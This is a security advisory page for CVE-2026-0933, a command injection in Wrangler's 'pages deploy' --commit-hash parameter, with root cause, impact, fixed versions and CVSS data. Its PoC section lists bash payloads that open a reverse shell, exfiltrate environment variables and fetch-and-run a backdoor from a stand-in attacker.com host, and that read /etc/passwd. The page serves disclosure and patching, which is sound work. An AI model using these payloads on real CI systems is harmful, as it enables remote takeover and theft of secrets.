Security Vulnerability Report
CVE-2026-0933 CVSS 9.9 CRITICAL

CVE-2026-0933

Published: 2026-01-20 23:16:06
Last Modified: 2026-01-27 21:12:29

Description

Summary

A command injection vulnerability (CWE-78) has been found to exist in the `wrangler pages deploy` command. The issue occurs because the `--commit-hash` parameter is passed directly to a shell command without proper validation or sanitization, allowing an attacker with control of `--commit-hash` to execute arbitrary commands on the system running Wrangler.

Root cause

The commitHash variable, derived from user input via the --commit-hash CLI argument, is interpolated directly into a shell command using template literals (e.g., execSync(`git show -s --format=%B ${commitHash}`)). Shell metacharacters are interpreted by the shell, enabling command execution.

Impact

This vulnerability is generally hard to exploit, as it requires --commit-hash to be attacker controlled. The vulnerability primarily affects CI/CD environments where `wrangler pages deploy` is used in automated pipelines and the --commit-hash parameter is populated from external, potentially untrusted sources. An attacker could exploit this to:

* Run any shell command.
* Exfiltrate environment variables.
* Compromise the CI runner to install backdoors or modify build artifacts.

Credits

Disclosed responsibly by kny4hacker.

Mitigation

* Wrangler v4 users are requested to upgrade to Wrangler v4.59.1 or higher.
* Wrangler v3 users are requested to upgrade to Wrangler v3.114.17 or higher.
* Users on Wrangler v2 (EOL) should upgrade to a supported major version.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cloudflare:wrangler:*:*:*:*:*:node.js:*:* - VULNERABLE
Wrangler v2 (all versions, EOL)
Wrangler v3 < 3.114.17
Wrangler v4 < 4.59.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
# CVE-2026-0933 PoC - Wrangler pages deploy Command Injection
# Target: wrangler pages deploy --commit-hash parameter

# Example 1: Basic command execution
wrangler pages deploy ./dist --commit-hash '$(whoami)'

# Example 2: Reverse shell connection
wrangler pages deploy ./dist --commit-hash '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

# Example 3: Exfiltrate environment variables
wrangler pages deploy ./dist --commit-hash '$(curl https://attacker.com/exfil?$(env|base64))'

# Example 4: Read sensitive files
wrangler pages deploy ./dist --commit-hash '$(cat /etc/passwd)'

# Example 5: Download and execute backdoor
wrangler pages deploy ./dist --commit-hash '$(curl http://attacker.com/backdoor.sh|bash)'

# Note: This PoC demonstrates the vulnerability for authorized security testing only

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0933", "sourceIdentifier": "[email protected]", "published": "2026-01-20T23:16:06.043", "lastModified": "2026-01-27T21:12:28.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SummaryA command injection vulnerability (CWE-78) has been found to exist in the `wrangler pages deploy` command. The issue occurs because the `--commit-hash` parameter is passed directly to a shell command without proper validation or sanitization, allowing an attacker with control of `--commit-hash` to execute arbitrary commands on the system running Wrangler.\n\n\n\n\nRoot causeThe commitHash variable, derived from user input via the --commit-hash CLI argument, is interpolated directly into a shell command using template literals (e.g.,  execSync(`git show -s --format=%B ${commitHash}`)). Shell metacharacters are interpreted by the shell, enabling command execution.\n\n\n\n\nImpactThis vulnerability is generally hard to exploit, as it requires --commit-hash to be attacker controlled. The vulnerability primarily affects CI/CD environments where `wrangler pages deploy` is used in automated pipelines and the \n\n--commit-hash parameter is populated from external, potentially untrusted sources. An attacker could exploit this to:\n\n * Run any shell command.\n * Exfiltrate environment variables.\n * Compromise the CI runner to install backdoors or modify build artifacts.\n\n\n\nCredits Disclosed responsibly by kny4hacker.\n\n\n\n\nMitigation\n * Wrangler v4 users are requested to upgrade to Wrangler v4.59.1 or higher.\n * Wrangler v3 users are requested to upgrade to Wrangler v3.114.17 or higher.\n * Users on Wrangler v2 (EOL) should upgrade to a supported major version."}, {"lang": "es", "value": "Resumen\nSe ha encontrado una vulnerabilidad de inyección de comandos (CWE-78) que existe en el comando 'wrangler pages deploy'. 
El problema ocurre porque el parámetro --commit-hash se pasa directamente a un comando de shell sin la validación o sanitización adecuadas, permitiendo a un atacante con control de --commit-hash ejecutar comandos arbitrarios en el sistema que ejecuta Wrangler.\n\nCausa raíz\nLa variable commitHash, derivada de la entrada del usuario a través del argumento CLI --commit-hash, se interpola directamente en un comando de shell usando literales de plantilla (p. ej., execSync('git show -s --format=%B ${commitHash}')). Los metacaracteres de shell son interpretados por el shell, lo que permite la ejecución de comandos.\n\nImpacto\nEsta vulnerabilidad es generalmente difícil de exploit, ya que requiere que --commit-hash esté controlado por el atacante. La vulnerabilidad afecta principalmente a entornos CI/CD donde 'wrangler pages deploy' se utiliza en pipelines automatizados y el parámetro --commit-hash se rellena desde fuentes externas, potencialmente no confiables. Un atacante podría exploit esto para:\n\n * Ejecutar cualquier comando de shell.\n * Exfiltrar variables de entorno.\n * Comprometer el ejecutor de CI para instalar puertas traseras o modificar artefactos de compilación.\n\nCréditos\nDivulgado de forma responsable por kny4hacker.\n\nMitigación\n * Se solicita a los usuarios de Wrangler v4 que actualicen a Wrangler v4.59.1 o superior.\n * Se solicita a los usuarios de Wrangler v3 que actualicen a Wrangler v3.114.17 o superior.\n * Los usuarios de Wrangler v2 (EOL) deben actualizar a una versión principal compatible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", 
"privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DE ... (truncated)